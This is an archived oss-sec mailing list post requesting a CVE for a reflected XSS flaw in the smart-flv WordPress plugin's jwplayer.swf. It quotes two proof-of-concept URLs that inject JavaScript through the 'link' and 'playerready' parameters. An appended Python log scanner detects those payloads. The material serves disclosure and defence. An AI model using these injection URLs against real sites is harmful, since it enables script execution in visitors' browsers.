oss-sec mailing list archives
CVE request: WordPress plugin smart-flv jwplayer.swf XSS
From: Henri Salo <henri () nerv fi>
Date: Mon, 25 Feb 2013 00:23:59 +0200
Hello list,

With wpscan-team I noticed that the file jwplayer.swf in the WordPress plugin smart-flv is vulnerable to a reflected XSS vulnerability.

URL: http://wordpress.org/extend/plugins/smart-flv/

416d0313c5f286c3a8e9daff520a9f44439b93f7 http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf

With user interaction (clicking the page):
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link

No interaction:
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29

WordPress guys, could you report this to the developer, since I don't know his/her email address? Thanks. Could you also tell me if there is a way to contact plugin developers directly? Thank you.

Please include the CVE in the changelog if possible.

--
Henri Salo

ps. http://paste.nerv.fi/36167527-horse.jpeg
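As an added example (not part of the original post or the plugin), the following Python scans web server access-log lines for requests to the vulnerable jwplayer.swf whose parameters carry the two payload shapes described in the report: a `playerready` callback that is not a bare function name, and a `link` whose scheme is not http(s). The rules for what counts as a legitimate value and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a callback name passed to the player should be a bare JavaScript
# identifier such as "onReady"; alert("horse") is a call expression, not a name.
IDENTIFIER = re.compile(r"^[A-Za-z_$][\w$]*$")
# Assumption: a click-through link from a video player should be a web URL.
SAFE_LINK_SCHEMES = {"", "http", "https"}
REQUEST_LINE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')

def classify_request(url):
    """Return the findings for one request URL; an empty list means nothing flagged."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/jwplayer.swf"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for value in params.get("playerready", []):
        if not IDENTIFIER.match(value):
            findings.append("playerready: callback is not a bare identifier")
    for value in params.get("link", []):
        # Browsers ignore embedded tabs/newlines and leading blanks when reading
        # a scheme, so strip control characters before inspecting it.
        cleaned = re.sub(r"[\x00-\x20]", "", value)
        scheme = urlsplit(cleaned).scheme.lower()
        if scheme not in SAFE_LINK_SCHEMES:
            findings.append(f"link: unexpected scheme '{scheme}'")
    return findings

def scan_access_log(lines):
    """Return (line number, findings) for each flagged request in a combined-format log."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if match:
            findings = classify_request(match.group(1))
            if findings:
                hits.append((number, findings))
    return hits

# Constructed sample log lines (not real traffic); lines 2 and 3 carry the two
# request URLs quoted in the report, line 1 is a benign player load.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Feb/2013:00:10:01 +0200] "GET /wp-content/plugins/smart-flv/jwplayer.swf?file=movie.mp4&link=http://example.com/more&linktarget=_blank HTTP/1.1" 200 151208',
    '203.0.113.9 - - [25/Feb/2013:00:10:07 +0200] "GET /wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link HTTP/1.1" 200 151208',
    '203.0.113.9 - - [25/Feb/2013:00:10:12 +0200] "GET /wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29 HTTP/1.1" 200 151208',
]

if __name__ == "__main__":
    for number, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(findings)}")
```

Requests to other .swf files are ignored on purpose, so the check stays specific to this plugin's player rather than flagging every `javascript:` string in the log.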